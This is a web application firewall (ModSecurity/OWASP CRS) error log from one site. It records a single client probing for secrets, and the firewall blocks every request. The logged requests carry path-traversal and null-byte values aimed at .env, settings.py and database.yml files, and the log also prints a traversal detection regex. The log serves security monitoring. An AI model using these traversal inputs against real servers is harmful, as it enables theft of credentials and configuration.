[Tue May 12 06:16:22.470066 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.470120 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.470177 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.470497 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.470589 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.470656 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.471330 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:22.547835 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:22.580565 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKplM1tk6y7yBJLpJpE9AAAAJY"]
[Tue May 12 06:16:22.602822 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpls1tk6y7yBJLpJpE9gAAAJY"]
[Tue May 12 06:16:22.602997 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpls1tk6y7yBJLpJpE9gAAAJY"]
[Tue May 12 06:16:23.623136 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKplhfeipD4uoG21Fo_wwAAAAI"]
[Tue May 12 06:16:23.827952 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKplhs7kySIUZ3ORnI1OAAAARE"]
[Tue May 12 06:16:23.828331 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKplxfeipD4uoG21Fo_xgAAAAI"]
[Tue May 12 06:16:23.828514 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKplxfeipD4uoG21Fo_xgAAAAI"]
[Tue May 12 06:16:23.847369 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.847415 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.847443 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.847655 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.847705 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.847735 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.848148 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:23.959632 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpls1tk6y7yBJLpJpE9gAAAJY"]
[Tue May 12 06:16:23.982534 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpl81tk6y7yBJLpJpE-AAAAJY"]
[Tue May 12 06:16:23.982749 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpl81tk6y7yBJLpJpE-AAAAJY"]
[Tue May 12 06:16:24.566803 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKplxfeipD4uoG21Fo_xgAAAAI"]
[Tue May 12 06:16:24.591030 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKpmBfeipD4uoG21Fo_yQAAAAI"]
[Tue May 12 06:16:24.591229 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKpmBfeipD4uoG21Fo_yQAAAAI"]
[Tue May 12 06:16:24.593689 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKplxs7kySIUZ3ORnI1PAAAARE"]
[Tue May 12 06:16:24.621016 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.621062 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.621089 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.621301 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.621337 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.621736 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:33216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpmBs7kySIUZ3ORnI1PQAAARE"]
[Tue May 12 06:16:24.732066 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpl81tk6y7yBJLpJpE-AAAAJY"]
